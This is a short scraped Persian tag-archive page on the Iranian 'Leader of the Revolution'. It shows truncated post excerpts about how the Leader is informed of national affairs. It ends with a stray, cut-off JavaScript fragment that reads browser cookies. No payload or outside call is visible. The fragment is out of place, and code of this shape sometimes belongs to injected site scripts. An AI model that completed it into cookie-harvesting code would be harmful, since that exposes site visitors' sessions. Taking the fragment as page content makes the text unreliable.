بایگانی برچسب برای: رهبر انقلاب

رهبر انقلاب از چه طریق و چگونه در جریان مسائل کشور قرار می‌گیرند؟

 گزاره‌ اول: تحلیل درست مبتنی بر اشراف کامل است هنوز ساعاتی…

از پنج صبح…

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…